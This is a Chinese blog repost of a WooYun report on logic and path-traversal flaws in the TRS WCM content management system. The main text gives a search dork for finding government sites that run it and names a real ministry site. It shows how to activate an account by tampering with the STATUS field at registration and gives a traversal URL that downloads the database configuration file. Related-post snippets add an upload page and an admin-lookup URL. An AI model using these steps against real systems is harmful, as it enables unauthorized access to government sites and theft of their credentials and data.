TRS内容管理平台用户注册逻辑漏洞

最新推荐文章于 2024-05-11 09:48:49 发布
最新推荐文章于 2024-05-11 09:48:49 发布
阅读量7.6k 收藏
点赞数
文章标签: 平台 firebug 数据库 2010

http://www.wooyun.org/bugs/wooyun-2010-08966

首先
site:gov.cn  inurl:WCM
TRS 的内容管理系统是国内政府网站使用最多的系统之一



如上面所说:外交部 http://wcm.fmprc.gov.cn/wcm/

网址加上:wcm/console/auth/reg_newuser.jsp
http://localhost:9999/wcm/console/auth/reg_newuser.jsp
注册,注意使用fireBUG修改表单,注意下图


即将随意表单改成  STATUS 值为 30,或增加STATUS字段表单。
然后提交注册


虽然说是“请等待开通!”,但实际上已经开通了,因为 STATUS 字段让我们改成正常了。
直接登陆


虽然没什么权限,但后台存在大量注入等漏洞
如:



可以通过注入直接操作数据库了。
http://localhost:9999/wcm/file/read_file.jsp?FileName=U020120628383491551127/../../../../../Tomcat/webapps/wcm/WEB-INF/classes/trsconfig/domain/config.xml&sDownName=xx
直接下载数据库配置文件

cnbird2008
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
TRS cms用户注册漏洞
2ed
06-25 3298
据了解TRS WCM涵盖网站建立、内容服务、内容传递等内容价值链的各个方面,将结构化和非结构化信息提供给所有用户。 既然在外网能访问TRS WCM,那就方便许多了,由于是第一次遇到此系统,所以去wooyun上搜了一下相关漏洞利用方式,发现其实wooyun上公布的对这个系统的漏洞利用方式还是很多的,都是些高危漏洞,其中有三个高危漏洞可以很好的利用一下,TRS WCM多为gov站点使用,不过这里遇到了...
wooyun.7z乌云数据库
10-22
wooyun.7z乌云数据库
TRS CMS(拓尔思CMS漏洞集合
热门推荐
收集盒 Book box
08-09 1万+
TRS(拓尔思)WCM 文件上传漏洞 影响版本: WCM5.2 WCM6.1 漏洞描述: TRSWCM是拓尔思系列产品的重要组成部分,服务于信息资源的发布。 Lee在对WCM6.1(STD1091SP2)进行风险评估的时候发现,file_upload.html未做访问限制,攻击者可以匿名访问上传页面进行文件上传操作。 说明: file/file_upload.html info
推荐开源项目:wooyun_public - 乌云公开漏洞与知识库爬虫和搜索
最新发布
gitblog_00065的博客
05-11 425
推荐开源项目:wooyun_public - 乌云公开漏洞与知识库爬虫和搜索 项目地址:https://gitcode.com/hanc00l/wooyun_public 1、项目介绍 wooyun_public 是一个由Python编写的爬虫项目,用于抓取并索引乌云平台的公开漏洞和知识库信息。项目提供了友好的界面,让用户能够方便地浏览和搜索这些宝贵的数据,对于安全研究人员、开发人员以及对此领域感...
TRS的WCM历史漏洞
weixin_42140534的博客
07-30 5449
1访问网站的登录页 看到TRS WCM知道为北京拓尔思开发的一个平台,这个平台是存在相关漏洞的 2 在网址后面添加查看管理员密码的链接 wcm/infoview.do?serviceid=wcm6_user&MethodName=getUsersByNames&UserNames=admin 3在地址栏中输入xxx:8080/wcm/app/login.jsp回车即可成功登录,且账号为system ...
TRS内容管理产品体系架构综述
07-08
TRS内容管理产品体系以CIO标准为基础,旨在构建一个新一代的内容管理平台,该平台具有协作性、行业性和开放性的特点,满足企业全面的内容管理需求。CIO标准强调了内容生命周期管理、行业针对性和系统开放性,以确保...
TRS内容管理系统产业化推广.pptx
09-25
TRS内容管理系统产业化推广】这份PPT主要介绍了北大法宝系列产品的详细介绍,特别是其在法律教育和法律信息检索领域的应用。这个系统是北京大学法学和计算机专家合作研发的专业法律法规数据库,不仅覆盖了广泛的...
TRS打造外交部全球网站群内容管理平台
03-03
针对外交部网站群网络内容管理系统的需求,TRS 提出了以统一内容管理平台为中心的解决方案,并综合采用网络存储、网络访问优化、网络安全保障等多种手段实现系统目标。外交部及驻外使领馆全球网站群以TRS 内容管理...
TRSWCM拓尔思海云集约化智能门户V8.0用户手册
12-17
该系统是一个基于Java技术和分布式技术构建的网络内容管理平台,专注于企业级协作和内容管理。以下是手册中的关键知识点: 1. **系统概述** - **系统简介**:TRS HyCloud IIP是一个集内容创建、维护、发布的协作...
wooyun镜像容器逆向分析
qingjie0ng的博客
08-16 1579
docker镜像进行逆向,可分析推出dockerfile文件
TRS WCM内容协作平台
07-08
TRS 内容协作平台处于TRS 内容管理基础架构的核心,秉承TRS内容管理CIO标准路线,集协作性、行业性和开放性于一体,是媒体整合、共享和利用数字内容资产,改善组织运行效率,提高核心竞争力的理想选择,可以帮助媒体快速地构建媒体网站、媒体内外信息门户、媒体办公协作平台、媒体的内容采编发平台等,实现全方位的内容管理
wyquery:Wooyun查询系统
03-11
wyquery Wooyun公开的突破详情是一个很好的资源,但是没有提供很好的搜索引擎和排序功能来进行数据分析,所以,这个项目用户关联wooyun上已经对外公开的入侵详情,并提供更多搜索和排序的功能。 你有没有想完成如下功能? 我想只看给钱的突破 我想只看带乌云标志的突破 我想按照等级排序战术 如果有,那你跟我遇到的问题一样,不妨试试这个项目线上已经搭建好的DEMO环境如下: 营造环境 建议在Linux下运行,当然Windows下也可以。Ruby2.0+ git clone https://github.com/LubyRuffy/wyquery.git cd wyquery bundle install rake db:migrate rails s 然后访问 初次抓取数据 cd wyquery ruby ./tools/import_bugs.rb 同步数据 这时可以建立定时任务
wooyun drops乌云知识库全部文章.zip
09-13
自行脑补,自行脑补,自行脑补,自行脑补,自行脑补,自行脑补,自行脑补,自行脑补,自行脑补,自行脑补,自行脑补,自行脑补,我只是资料的搬运工,内容质量不负责
精防wooyun程序源码加数据库
01-09
使用ThinkPHP,精品防止wooyun源码程序。
WooyunDrops, Wooyun知识库,乌云知识库,https.zip
09-17
WooyunDrops, Wooyun知识库,乌云知识库,https Wooyun丢弃演示:https://wooyun.kieran.top静态版乌云丢弃选项:2.图片依赖于 https://github.com/SuperKieran/wooyun-img
【资源学习】wooyun镜像站
Websec
03-19 5815
wooyun镜像站地址:https://wooyun.kieran.top
本地搭建Wooyun漏洞库(二)——Ubuntu 18.04下搭建WooYun漏洞
浅浅的博客
08-23 3068
本文参考https://github.com/grt1st/wooyun_search 这篇文章是建立在已经搭建好LAMP环境的基础上进行的,搭建方法可见:本地搭建Wooyun漏洞库(一)——Ubuntu 18.04下搭建LAMP环境 一、下载资源 访问https://github.com/grt1st/wooyun_search,下载所需文件。 下载该ZIP文件(文件名为:wooyu...
TRS全文数据库管理平台:引领企业搜索引擎革命
"TRS全文数据库管理平台是北京拓尔思(TRS)信息技术有限公司开发的一款高效、安全的数据库管理系统,尤其适用于处理非结构化和结构化数据的联合检索。该平台拥有八大技术特点,包括异构数据统一管理、Native XML...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值